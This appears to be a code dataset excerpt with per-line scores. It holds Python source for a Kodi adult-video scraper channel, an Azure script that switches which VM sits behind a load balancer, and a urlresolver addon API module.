Item(channel=__channel__, action=\"peliculas\", title=\">> Página siguiente\" ,fanart=__fanart__, url=url)) \n", " return itemlist\n", "\n", "\n", "def play(item):\n", " logger.info(\"[pornhub.py] play\")\n", " itemlist=[]\n", " \n", " #item.url='http://es.pornhub.com/embed/' + viewkey\n", " \n", " # Descarga la página\n", " data = get_main_page(item.url)\n", " data = scrapertools.find_single_match(data,'html5Config([^}]+)},')\n", " url = scrapertools.get_match(data,\"src\\s+:\\s+'([^']+)',\")\n", " \n", " #url= \"http://cdn2b.embed.pornhub.phncdn.com/videos/201501/19/37717631/480P_600K_37717631.mp4?rs=200&ri=2500&ip=188.79.24.200&s=1421873759&e=1421880959&h=6cd0058bc8e5abac9ccfdaa50c6bdf19\"\n", " #logger.info(\"url=\"+url)\n", " server=\"Directo\"\n", " itemlist.append( Item(channel=__channel__, title=\"\" , url=url , server=server, folder=False) )\n", "\n", " return itemlist\n", " \n", "\n", "def get_main_page(url):\n", " logger.info(\"[pornhub.py] get_main_page\")\n", "\n", " headers=[]\n", " headers.append([\"User-Agent\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0\"])\n", " headers.append([\"Accept\",\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"])\n", " headers.append([\"Accept-Language\",\"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\"])\n", " headers.append([\"Accept-Encoding\",\"gzip, deflate\"])\n", "\n", " # Descarga la página\n", " data = scrapertools.cachePage(url,headers=headers)\n", " #logger.info(\"pelisalacarta.channels.pornhub data=\"+data)\n", "\n", " return data\n" ]
[ 0, 0.016129032258064516, 0, 0, 0, 0.016129032258064516, 0.11764705882352941, 0.06666666666666667, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0.058823529411764705, 0, 0, 0.05, 0, 0, 0.2, 0.02631578947368421, 0.2, 0, 0, 0.020833333333333332, 0.2, 0, 0, 0, 0.006060606060606061, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.03333333333333333, 0, 0, 0, 0.1111111111111111, 0.017543859649122806, 0, 0.2, 0.03278688524590164, 0, 0.016129032258064516, 0, 0.043478260869565216, 0.125, 0.07142857142857142, 0.03333333333333333, 0.058823529411764705, 0.030303030303030304, 0.07692307692307693, 0, 0, 0, 0.047619047619047616, 0, 0, 0.125, 0, 0, 0.01639344262295082, 0.2, 0, 0, 0, 0, 0.004878048780487805, 0, 0, 0, 0, 0.0013774104683195593, 0, 0, 0, 0.004975124378109453, 0, 0, 0, 0.004975124378109453, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.1111111111111111, 0, 0, 0.012987012987012988, 0, 0, 0.2, 0.017543859649122806, 0, 0.2, 0.06493506493506493, 0.030303030303030304, 0.019230769230769232, 0.04, 0.018518518518518517, 0.058823529411764705, 0.021052631578947368, 0.04580152671755725, 0.1111111111111111, 0, 0, 0.2, 0.017543859649122806, 0, 0.2, 0.043478260869565216, 0.046511627906976744, 0.038461538461538464, 0, 0, 0, 0, 0, 0.0625, 0.2, 0.01818181818181818, 0.2, 0, 0, 0.014084507042253521, 0.04838709677419355, 0.2, 0.010416666666666666, 0.034482758620689655, 0.047619047619047616, 0.050505050505050504, 0, 0, 0.2, 0, 0, 0, 0, 0.06666666666666667, 0.01680672268907563, 0.020618556701030927, 0.01282051282051282, 0.017857142857142856, 0, 0, 0.01818181818181818, 0.016129032258064516, 0, 0 ]
173
0.030112
false
#!/usr/bin/python # Setup.. # pip azure from azure.mgmt.common import ( SubscriptionCloudCredentials ) from azure.mgmt.resource import ( ProviderOperations, ResourceGroupListParameters, ResourceGroupOperations, ResourceManagementClient, ResourceIdentity, GenericResource ) from azure.mgmt.network import ( NetworkResourceProviderClient, LoadBalancer, BackendAddressPool, ResourceId ) from azure.mgmt.network.networkresourceprovider import ( NetworkInterface ) from azure.mgmt.compute import ( ComputeManagementClient ) from requests import Request, Session import requests, json, re, os, logging, getopt, sys logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s') def load_config(): with open('settings.private.json') as config_file: global config, subscription_id, client_id, client_secret, endpoint config = json.load(config_file) subscription_id = config['subscription_id'] client_id = config['client_id'] client_secret = config['client_secret'] endpoint = config['endpoint'] with open('environment.json') as machine_file: global environment, number_of_machines environment = json.load(machine_file) number_of_machines = len(environment['vmnames']) logging.info('there are %s machines', number_of_machines) def get_token_from_client_credentials(endpoint, client_id, client_secret): payload = { 'grant_type': 'client_credentials', 'client_id': client_id, 'client_secret': client_secret, 'resource': 'https://management.core.windows.net/', } #TODO add back in verify for non-fiddler #NOTE add Verify=False when going via a proxy with fake cert / fiddler response = requests.post(endpoint, data=payload).json() return response['access_token'] def get_virtual_machine(resource_group_name, vm_name): """ :param resource_group_name: str :param vm_name: str :return: azure.mgmt.compute.VirtualMachine """ virtual_machine = compute_client.virtual_machines.get(resource_group_name, vm_name).virtual_machine logging.info('using virtual machine id: %s', virtual_machine.id) return virtual_machine def get_network_interface_ip_configuration(resource_group_name, network_interface_name): network_interface = network_client.network_interfaces.get(resource_group_name, network_interface_name) return network_interface #for ipconfig in network_interface.network_interface.ip_configurations: # return ipconfig def get_virtual_machine_network_interface(resource_group_name, virtual_machine_name): virtual_machine = get_virtual_machine(resource_group_name, virtual_machine_name) for profile in virtual_machine.network_profile.network_interfaces: nic_uri = profile.reference_uri #network_interface = get_network_interface(resource_group_name) label = os.path.basename(os.path.normpath(nic_uri)) logging.info('nic on vm to use is: %s', label) network_interface = get_network_interface_ip_configuration(resource_group_name, label) logging.info('nic id is: %s', network_interface.network_interface.id) return network_interface.network_interface def get_master_vmname_from_arg(arg): if arg == '0': rv = { 'newMaster' : environment['vmnames'][0], 'oldMaster' : environment['vmnames'][1] } elif arg == '1': rv = { 'newMaster' : environment['vmnames'][1], 'oldMaster' : environment['vmnames'][0] } else: raise ValueError('Only accept 0 or 1 as New Master value') return rv def build_request(vm_object, nic_object, load_balancer=None): """ :param vm_object : azure.mgmt.compute.VirtualMachine :param nic_object : azure.mgmt.network.networkresourceprovider.NetworkInterface :param load_balancer : azure.mgmt.network.LoadBalancer :return: dict """ if load_balancer == None: backend_pool = [] else: backend_pool = [{ 'id' : load_balancer.load_balancer.backend_address_pools[0].id }] request = { 'properties': { 'virtualMachine' : { 'id' : vm_object.virtual_machine.id }, 'ipConfigurations' : [{ #may have to build by hand 'properties' : { 'loadBalancerBackendAddressPools' : backend_pool, 'subnet' : { 'id' : nic_object.ip_configurations[0].subnet.id } }, 'name' : nic_object.ip_configurations[0].name, 'id' : nic_object.ip_configurations[0].id }] }, 'id' : nic_object.id, 'name' : nic_object.name, 'location' : vm_object.virtual_machine.location, 'type' : 'Microsoft.Network/networkInterfaces' } return request def send_loadbalancer_request(payload, resource_id, max_retries=20): endpoint = network_client.base_uri + resource_id + '?api-version=' + network_client.api_version header = { 'Authorization' : 'Bearer ' + auth_token } while (max_retries > 0): session = Session() request = Request('PUT', endpoint, json=payload, headers=header) prepared = session.prepare_request(request) logging.debug('raw body sent') logging.debug(prepared.body) response = session.send(prepared) if (response.status_code == 200): break elif (response.status_code == 429): max_retries = max_retries - 1 logging.warn('retrying an HTTP send due to 429 retryable response') logging.warn('this will be try# %s', max_retries) return response def main(argv): try: opts, args = getopt.getopt(sys.argv[1:], 'n:r:') except getopt.GetoptError: logging.exception('invalid options - switchMaster -newmaster 0|1') # Startup load_config() for opt,arg in opts: if opt in ('-n'): new_master_arg = arg logging.info('newMaster will be %s', new_master_arg) #now get the existing virtual machines vmnames = get_master_vmname_from_arg(new_master_arg) elif opt in ('-r'): max_retries = arg logging.info('max retries set to %s', max_retries) # OAuth token needed global auth_token auth_token = get_token_from_client_credentials(endpoint, client_id, client_secret) # now the Azure management credentials credentials = SubscriptionCloudCredentials(subscription_id, auth_token) # now the specific compute, network resource type clients global compute_client, network_client, resource_client compute_client = ComputeManagementClient(credentials) network_client = NetworkResourceProviderClient(credentials) resource_client = ResourceManagementClient(credentials) #TODO modify this to mach your specific settings resource_group = environment['resourceGroup'] load_balancer_name = environment['loadBalancerName'] subnet_name = environment['subnetName']; virtual_network_name = environment['virtualNetworkName']; #TODO - end - only the "above" should need to change. old_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['oldMaster']['name']) new_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['newMaster']['name']) #get the subnet we are in subnet = network_client.subnets.get(resource_group, virtual_network_name, subnet_name) #the load balancer load_balancer = network_client.load_balancers.get(resource_group, load_balancer_name) #get the 2 nic cards for the VM's in this subnet/loadbalncer config new_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['newMaster']['name']) old_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['oldMaster']['name']) old_master_request = build_request(old_master_vm, old_master_nic) new_master_request = build_request(new_master_vm, new_master_nic, load_balancer) send_loadbalancer_request(old_master_request, old_master_nic.id, max_retries) #make sure to add in the backendpool send_loadbalancer_request(new_master_request, new_master_nic.id, max_retries) if __name__ == "__main__": main(sys.argv[1:])
[ "#!/usr/bin/python\n", "\n", "# Setup..\n", "\n", "# pip azure\n", "from azure.mgmt.common import ( \n", " SubscriptionCloudCredentials\n", ")\n", "\n", "from azure.mgmt.resource import (\n", " ProviderOperations,\n", " ResourceGroupListParameters,\n", " ResourceGroupOperations,\n", " ResourceManagementClient,\n", " ResourceIdentity,\n", " GenericResource\n", ")\n", "\n", "from azure.mgmt.network import (\n", " NetworkResourceProviderClient,\n", " LoadBalancer,\n", " BackendAddressPool,\n", " ResourceId\n", ")\n", "\n", "from azure.mgmt.network.networkresourceprovider import (\n", " NetworkInterface\n", ")\n", "\n", "from azure.mgmt.compute import (\n", " ComputeManagementClient\n", ")\n", "\n", "from requests import Request, Session\n", "\n", "import requests, json, re, os, logging, getopt, sys\n", "\n", "\n", "logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')\n", "\n", "def load_config():\n", " with open('settings.private.json') as config_file:\n", " global config, subscription_id, client_id, client_secret, endpoint\n", " config = json.load(config_file)\n", " subscription_id = config['subscription_id']\n", " client_id = config['client_id']\n", " client_secret = config['client_secret']\n", " endpoint = config['endpoint']\n", "\n", " with open('environment.json') as machine_file:\n", " global environment, number_of_machines\n", " environment = json.load(machine_file)\n", " number_of_machines = len(environment['vmnames'])\n", " logging.info('there are %s machines', number_of_machines)\n", "\n", "\n", "def get_token_from_client_credentials(endpoint, client_id, client_secret):\n", " payload = {\n", " 'grant_type': 'client_credentials',\n", " 'client_id': client_id,\n", " 'client_secret': client_secret,\n", " 'resource': 'https://management.core.windows.net/',\n", " }\n", " #TODO add back in verify for non-fiddler\n", " #NOTE add Verify=False when going via a proxy with fake cert / fiddler\n", " response = requests.post(endpoint, data=payload).json()\n", " return response['access_token']\n", "\n", "def get_virtual_machine(resource_group_name, vm_name):\n", " \"\"\"\n", " :param resource_group_name: str\n", " :param vm_name: str\n", " :return: azure.mgmt.compute.VirtualMachine\n", " \"\"\"\n", " virtual_machine = compute_client.virtual_machines.get(resource_group_name, vm_name).virtual_machine\n", " logging.info('using virtual machine id: %s', virtual_machine.id)\n", " return virtual_machine\n", "\n", "def get_network_interface_ip_configuration(resource_group_name, network_interface_name):\n", " network_interface = network_client.network_interfaces.get(resource_group_name, network_interface_name)\n", " return network_interface\n", " #for ipconfig in network_interface.network_interface.ip_configurations:\n", " # return ipconfig\n", "\n", "def get_virtual_machine_network_interface(resource_group_name, virtual_machine_name):\n", " virtual_machine = get_virtual_machine(resource_group_name, virtual_machine_name)\n", " for profile in virtual_machine.network_profile.network_interfaces:\n", " nic_uri = profile.reference_uri\n", "\n", " #network_interface = get_network_interface(resource_group_name)\n", " label = os.path.basename(os.path.normpath(nic_uri))\n", " logging.info('nic on vm to use is: %s', label)\n", "\n", " network_interface = get_network_interface_ip_configuration(resource_group_name, label)\n", " logging.info('nic id is: %s', network_interface.network_interface.id)\n", " return network_interface.network_interface\n", "\n", "def get_master_vmname_from_arg(arg):\n", " if arg == '0':\n", " rv = { \n", " 'newMaster' : environment['vmnames'][0],\n", " 'oldMaster' : environment['vmnames'][1] \n", " }\n", " elif arg == '1':\n", " rv = { \n", " 'newMaster' : environment['vmnames'][1],\n", " 'oldMaster' : environment['vmnames'][0] \n", " }\n", " else:\n", " raise ValueError('Only accept 0 or 1 as New Master value')\n", "\n", " return rv\n", "\n", "def build_request(vm_object, nic_object, load_balancer=None):\n", " \"\"\"\n", " :param vm_object : azure.mgmt.compute.VirtualMachine\n", " :param nic_object : azure.mgmt.network.networkresourceprovider.NetworkInterface\n", " :param load_balancer : azure.mgmt.network.LoadBalancer\n", " :return: dict\n", " \"\"\"\n", " if load_balancer == None:\n", " backend_pool = []\n", " else:\n", " backend_pool = [{ 'id' : load_balancer.load_balancer.backend_address_pools[0].id }]\n", "\n", " request = {\n", " 'properties': {\n", " 'virtualMachine' : {\n", " 'id' : vm_object.virtual_machine.id\n", " },\n", " 'ipConfigurations' : [{ #may have to build by hand\n", " 'properties' : {\n", " 'loadBalancerBackendAddressPools' : backend_pool,\n", " 'subnet' : {\n", " 'id' : nic_object.ip_configurations[0].subnet.id\n", " }\n", " },\n", " 'name' : nic_object.ip_configurations[0].name,\n", " 'id' : nic_object.ip_configurations[0].id\n", " }]\n", " },\n", " 'id' : nic_object.id,\n", " 'name' : nic_object.name,\n", " 'location' : vm_object.virtual_machine.location,\n", " 'type' : 'Microsoft.Network/networkInterfaces'\n", " }\n", "\n", "\n", " return request\n", "\n", "def send_loadbalancer_request(payload, resource_id, max_retries=20):\n", " endpoint = network_client.base_uri + resource_id + '?api-version=' + network_client.api_version\n", "\n", " header = { 'Authorization' : 'Bearer ' + auth_token }\n", " \n", " while (max_retries > 0):\n", " session = Session()\n", " request = Request('PUT', endpoint, json=payload, headers=header)\n", " prepared = session.prepare_request(request)\n", "\n", " logging.debug('raw body sent')\n", " logging.debug(prepared.body)\n", "\n", " response = session.send(prepared)\n", " if (response.status_code == 200):\n", " break\n", " elif (response.status_code == 429):\n", " max_retries = max_retries - 1\n", " logging.warn('retrying an HTTP send due to 429 retryable response')\n", " logging.warn('this will be try# %s', max_retries)\n", " \n", " return response\n", "\n", "\n", "def main(argv):\n", " try:\n", " opts, args = getopt.getopt(sys.argv[1:], 'n:r:')\n", " except getopt.GetoptError:\n", " logging.exception('invalid options - switchMaster -newmaster 0|1')\n", "\n", " # Startup\n", " load_config()\n", "\n", " for opt,arg in opts:\n", " if opt in ('-n'):\n", " new_master_arg = arg\n", " logging.info('newMaster will be %s', new_master_arg) \n", " #now get the existing virtual machines\n", " vmnames = get_master_vmname_from_arg(new_master_arg)\n", " elif opt in ('-r'):\n", " max_retries = arg\n", " logging.info('max retries set to %s', max_retries)\n", "\n", "\n", " # OAuth token needed\n", " global auth_token\n", " auth_token = get_token_from_client_credentials(endpoint, client_id, client_secret)\n", "\n", " # now the Azure management credentials\n", " credentials = SubscriptionCloudCredentials(subscription_id, auth_token)\n", "\n", " # now the specific compute, network resource type clients\n", " global compute_client, network_client, resource_client\n", " compute_client = ComputeManagementClient(credentials)\n", " network_client = NetworkResourceProviderClient(credentials)\n", " resource_client = ResourceManagementClient(credentials)\n", "\n", " #TODO modify this to mach your specific settings\n", " resource_group = environment['resourceGroup']\n", " load_balancer_name = environment['loadBalancerName']\n", " \n", " subnet_name = environment['subnetName'];\n", " virtual_network_name = environment['virtualNetworkName'];\n", "\n", " #TODO - end - only the \"above\" should need to change.\n", "\n", " old_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['oldMaster']['name'])\n", " new_master_vm = compute_client.virtual_machines.get(resource_group, vmnames['newMaster']['name'])\n", "\n", " #get the subnet we are in\n", " subnet = network_client.subnets.get(resource_group, virtual_network_name, subnet_name)\n", "\n", " #the load balancer\n", " load_balancer = network_client.load_balancers.get(resource_group, load_balancer_name)\n", "\n", " #get the 2 nic cards for the VM's in this subnet/loadbalncer config\n", " new_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['newMaster']['name'])\n", " old_master_nic = get_virtual_machine_network_interface(resource_group, vmnames['oldMaster']['name'])\n", "\n", "\n", " old_master_request = build_request(old_master_vm, old_master_nic)\n", " new_master_request = build_request(new_master_vm, new_master_nic, load_balancer)\n", "\n", "\n", " send_loadbalancer_request(old_master_request, old_master_nic.id, max_retries)\n", "\n", " #make sure to add in the backendpool\n", " send_loadbalancer_request(new_master_request, new_master_nic.id, max_retries)\n", "\n", "\n", "if __name__ == \"__main__\":\n", " main(sys.argv[1:])\n", "\n" ]
[ 0, 0, 0, 0, 0, 0.030303030303030304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.022222222222222223, 0.013333333333333334, 0, 0, 0, 0.01818181818181818, 0, 0, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0.02247191011235955, 0.009345794392523364, 0, 0.013157894736842105, 0, 0, 0.023255813953488372, 0.011764705882352941, 0, 0, 0, 0.014705882352941176, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0.02702702702702703, 0, 0.0625, 0.018867924528301886, 0.03773584905660377, 0, 0, 0.0625, 0.018867924528301886, 0.03773584905660377, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0, 0, 0.011904761904761904, 0, 0, 0, 0.03333333333333333, 0, 0, 0.043478260869565216, 0, 0, 0, 0.030303030303030304, 0.019230769230769232, 0, 0.047619047619047616, 0.030303030303030304, 0.014285714285714285, 0.030303030303030304, 0.013513513513513514, 0, 0, 0.015873015873015872, 0.017241379310344827, 0, 0, 0.03333333333333333, 0.029411764705882353, 0.017543859649122806, 0.01818181818181818, 0, 0, 0, 0.05263157894736842, 0, 0.014492753623188406, 0.01, 0, 0.05172413793103448, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04, 0, 0, 0.012987012987012988, 0.0196078431372549, 0, 0, 0, 0, 0, 0, 0.04, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.018867924528301886, 0, 0, 0.2, 0.022222222222222223, 0.016129032258064516, 0, 0.017241379310344827, 0, 0.00980392156862745, 0.00980392156862745, 0, 0.03333333333333333, 0.01098901098901099, 0, 0.043478260869565216, 0.011111111111111112, 0, 0.013888888888888888, 0.009523809523809525, 0.009523809523809525, 0, 0, 0.014285714285714285, 0.011764705882352941, 0, 0, 0.024390243902439025, 0, 0.024390243902439025, 0.012195121951219513, 0, 0, 0, 0.045454545454545456, 1 ]
243
0.013044
false
# urlresolver XBMC Addon # Copyright (C) 2011 t0mm0 # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. ''' This module provides the main API for accessing the urlresolver features. For most cases you probably want to use :func:`urlresolver.resolve` or :func:`urlresolver.choose_source`. .. seealso:: :class:`HostedMediaFile` ''' import os import common import plugnplay from types import HostedMediaFile from types import URLWithEpisodes from .plugnplay.interfaces import UrlResolver from .plugnplay.interfaces import EpisodeResolver from .plugnplay.interfaces import PluginSettings from .plugnplay.interfaces import SiteAuth import xbmcgui import xbmcaddon #load all available plugins plugnplay.set_plugin_dirs(common.plugins_path) plugnplay.load_plugins() def resolve(web_url): ''' Resolve a web page to a media stream. It is usually as simple as:: import urlresolver media_url = urlresolver.resolve(web_url) where ``web_url`` is the address of a web page which is associated with a media file and ``media_url`` is the direct URL to the media. Behind the scenes, :mod:`urlresolver` will check each of the available resolver plugins to see if they accept the ``web_url`` in priority order (lowest priotity number first). When it finds a plugin willing to resolve the URL, it passes the ``web_url`` to the plugin and returns the direct URL to the media file, or ``False`` if it was not possible to resolve. .. seealso:: :class:`HostedMediaFile` Args: web_url (str): A URL to a web page associated with a piece of media content. Returns: If the ``web_url`` could be resolved, a string containing the direct URL to the media file, if not, returns ``False``. ''' source = HostedMediaFile(url=web_url) return source.resolve() def filter_source_list(source_list): ''' Takes a list of :class:`HostedMediaFile`s representing web pages that are thought to be associated with media content. If no resolver plugins exist to resolve a :class:`HostedMediaFile` to a link to a media file it is removed from the list. Args: urls (list of :class:`HostedMediaFile`): A list of :class:`HostedMediaFiles` representing web pages that are thought to be associated with media content. Returns: The same list of :class:`HostedMediaFile` but with any that can't be resolved by a resolver plugin removed. ''' return [source for source in source_list if source] def choose_source(sources): ''' Given a list of :class:`HostedMediaFile` representing web pages that are thought to be associated with media content this function checks which are playable and if there are more than one it pops up a dialog box displaying the choices. Example:: sources = [HostedMediaFile(url='http://youtu.be/VIDEOID', title='Youtube [verified] (20 views)'), HostedMediaFile(url='http://putlocker.com/file/VIDEOID', title='Putlocker (3 views)')] source = urlresolver.choose_source(sources) if source: stream_url = source.resolve() addon.resolve_url(stream_url) else: addon.resolve_url(False) Args: sources (list): A list of :class:`HostedMediaFile` representing web pages that are thought to be associated with media content. Returns: The chosen :class:`HostedMediaFile` or ``False`` if the dialog is cancelled or none of the :class:`HostedMediaFile` are resolvable. ''' #get rid of sources with no resolver plugin sources = filter_source_list(sources) #show dialog to choose source if len(sources) > 1: dialog = xbmcgui.Dialog() titles = [] for source in sources: titles.append(source.title) index = dialog.select('Choose your stream', titles) if index > -1: return sources[index] else: return False #only one playable source so just play it elif len(sources) == 1: return sources[0] #no playable sources available else: common.addon.log_error('no playable streams found') return False def get_res_setting(): value = common.addon.get_setting('%s_%s' % ("ResolutionSetting", "quality")) if value == "0": dialog = xbmcgui.Dialog() titles = [u'每次询问', u'320P(流畅):适合非常非常慢的网速', u'480P(高清):适合一般宽带上网的网速4M左右', u'720P(超清):适合比较快的光纤或者小区宽带10M左右', u'1080P(蓝光):需要极高的网速即使40M以上也不保证能正常播放'] index = dialog.select('选择适合你网络环境的清晰度', titles) if index != -1: xbmcaddon.Addon(id='script.module.urlresolvercn').setSetting('%s_%s' % ("ResolutionSetting", "quality"),str(index)) return index else: return False else: return int(value) def display_settings(): ''' Opens the settings dialog for :mod:`urlresolver` and its plugins. This can be called from your addon to provide access to global :mod:`urlresolver` settings. Each resolver plugin is also capable of exposing settings. .. note:: All changes made to these setting by the user are global and will affect any addon that uses :mod:`urlresolver` and its plugins. ''' _update_settings_xml() common.addon.show_settings() def _update_settings_xml(): ''' This function writes a new ``resources/settings.xml`` file which contains all settings for this addon and its plugins. ''' try: try: os.makedirs(os.path.dirname(common.settings_file)) except OSError: pass f = open(common.settings_file, 'w') try: f.write('<?xml version="1.0" encoding="utf-8" standalone="yes"?>\n') f.write('<settings>\n') for imp in PluginSettings.implementors(): f.write('<category label="%s">\n' % imp.name) f.write(imp.get_settings_xml()) f.write('</category>\n') f.write('</settings>') finally: f.close except IOError: common.addon.log_error('error writing ' + common.settings_file) #make sure settings.xml is up to date _update_settings_xml()
[ "# urlresolver XBMC Addon\n", "# Copyright (C) 2011 t0mm0\n", "#\n", "# This program is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# This program is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with this program. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "'''\n", "This module provides the main API for accessing the urlresolver features.\n", "\n", "For most cases you probably want to use :func:`urlresolver.resolve` or \n", ":func:`urlresolver.choose_source`.\n", "\n", ".. seealso::\n", "\t\n", "\t:class:`HostedMediaFile`\n", "\n", "\n", "'''\n", "\n", "import os\n", "import common\n", "import plugnplay\n", "from types import HostedMediaFile\n", "from types import URLWithEpisodes\n", "from .plugnplay.interfaces import UrlResolver\n", "from .plugnplay.interfaces import EpisodeResolver\n", "from .plugnplay.interfaces import PluginSettings\n", "from .plugnplay.interfaces import SiteAuth\n", "import xbmcgui\n", "import xbmcaddon\n", "\n", "#load all available plugins\n", "plugnplay.set_plugin_dirs(common.plugins_path)\n", "plugnplay.load_plugins()\n", "\n", "def resolve(web_url):\n", " '''\n", " Resolve a web page to a media stream.\n", " \n", " It is usually as simple as::\n", " \n", " import urlresolver\n", " media_url = urlresolver.resolve(web_url) \n", " \n", " where ``web_url`` is the address of a web page which is associated with a \n", " media file and ``media_url`` is the direct URL to the media. \n", "\n", " Behind the scenes, :mod:`urlresolver` will check each of the available \n", " resolver plugins to see if they accept the ``web_url`` in priority order \n", " (lowest priotity number first). When it finds a plugin willing to resolve \n", " the URL, it passes the ``web_url`` to the plugin and returns the direct URL \n", " to the media file, or ``False`` if it was not possible to resolve.\n", " \n", "\t.. seealso::\n", "\t\t\n", "\t\t:class:`HostedMediaFile`\n", "\n", " Args:\n", " web_url (str): A URL to a web page associated with a piece of media\n", " content.\n", " \n", " Returns:\n", " If the ``web_url`` could be resolved, a string containing the direct \n", " URL to the media file, if not, returns ``False``. \n", " '''\n", " source = HostedMediaFile(url=web_url)\n", " return source.resolve()\n", "\n", " \n", " \n", "def filter_source_list(source_list):\n", " '''\n", " Takes a list of :class:`HostedMediaFile`s representing web pages that are \n", " thought to be associated with media content. If no resolver plugins exist \n", " to resolve a :class:`HostedMediaFile` to a link to a media file it is \n", " removed from the list.\n", " \n", " Args:\n", " urls (list of :class:`HostedMediaFile`): A list of \n", " :class:`HostedMediaFiles` representing web pages that are thought to be \n", " associated with media content.\n", " \n", " Returns:\n", " The same list of :class:`HostedMediaFile` but with any that can't be \n", " resolved by a resolver plugin removed.\n", " \n", " '''\n", " return [source for source in source_list if source]\n", "\n", "\n", "def choose_source(sources):\n", " '''\n", " Given a list of :class:`HostedMediaFile` representing web pages that are \n", " thought to be associated with media content this function checks which are \n", " playable and if there are more than one it pops up a dialog box displaying \n", " the choices.\n", " \n", " Example::\n", " \n", " sources = [HostedMediaFile(url='http://youtu.be/VIDEOID', title='Youtube [verified] (20 views)'),\n", " HostedMediaFile(url='http://putlocker.com/file/VIDEOID', title='Putlocker (3 views)')]\n", "\t\tsource = urlresolver.choose_source(sources)\n", "\t\tif source:\n", "\t\t\tstream_url = source.resolve()\n", "\t\t\taddon.resolve_url(stream_url)\n", "\t\telse:\n", "\t\t\taddon.resolve_url(False)\n", "\n", " Args:\n", " sources (list): A list of :class:`HostedMediaFile` representing web \n", " pages that are thought to be associated with media content.\n", " \n", " Returns:\n", " The chosen :class:`HostedMediaFile` or ``False`` if the dialog is \n", " cancelled or none of the :class:`HostedMediaFile` are resolvable. \n", " \n", " '''\n", " #get rid of sources with no resolver plugin\n", " sources = filter_source_list(sources)\n", " \n", " #show dialog to choose source\n", " if len(sources) > 1:\n", " dialog = xbmcgui.Dialog()\n", " titles = []\n", " for source in sources:\n", " titles.append(source.title)\n", " index = dialog.select('Choose your stream', titles)\n", " if index > -1:\n", " return sources[index]\n", " else:\n", " return False\n", " \n", " #only one playable source so just play it\n", " elif len(sources) == 1:\n", " return sources[0] \n", " \n", " #no playable sources available\n", " else:\n", " common.addon.log_error('no playable streams found')\n", " return False\n", "\n", "def get_res_setting():\n", " value = common.addon.get_setting('%s_%s' % \n", " (\"ResolutionSetting\", \"quality\"))\n", " \n", " if value == \"0\":\n", " dialog = xbmcgui.Dialog()\n", " titles = [u'每次询问',\n", " u'320P(流畅):适合非常非常慢的网速',\n", " u'480P(高清):适合一般宽带上网的网速4M左右',\n", " u'720P(超清):适合比较快的光纤或者小区宽带10M左右',\n", " u'1080P(蓝光):需要极高的网速即使40M以上也不保证能正常播放']\n", " index = dialog.select('选择适合你网络环境的清晰度', titles)\n", " if index != -1:\n", " xbmcaddon.Addon(id='script.module.urlresolvercn').setSetting('%s_%s' % \n", " (\"ResolutionSetting\", \"quality\"),str(index))\n", " return index\n", " else:\n", " return False\n", " else:\n", " return int(value)\n", "\n", "def display_settings():\n", " '''\n", " Opens the settings dialog for :mod:`urlresolver` and its plugins.\n", " \n", " This can be called from your addon to provide access to global \n", " :mod:`urlresolver` settings. Each resolver plugin is also capable of \n", " exposing settings.\n", " \n", " .. note::\n", " \n", " All changes made to these setting by the user are global and will \n", " affect any addon that uses :mod:`urlresolver` and its plugins.\n", " '''\n", " _update_settings_xml()\n", " common.addon.show_settings()\n", " \n", " \n", "def _update_settings_xml():\n", " '''\n", " This function writes a new ``resources/settings.xml`` file which contains\n", " all settings for this addon and its plugins.\n", " '''\n", " try:\n", " try:\n", " os.makedirs(os.path.dirname(common.settings_file))\n", " except OSError:\n", " pass\n", "\n", " f = open(common.settings_file, 'w')\n", " try:\n", " f.write('<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\\n')\n", " f.write('<settings>\\n') \n", " for imp in PluginSettings.implementors():\n", " f.write('<category label=\"%s\">\\n' % imp.name)\n", " f.write(imp.get_settings_xml())\n", " f.write('</category>\\n')\n", " f.write('</settings>')\n", " finally:\n", " f.close\n", " except IOError:\n", " common.addon.log_error('error writing ' + common.settings_file)\n", "\n", "\n", "#make sure settings.xml is up to date\n", "_update_settings_xml()\n" ]
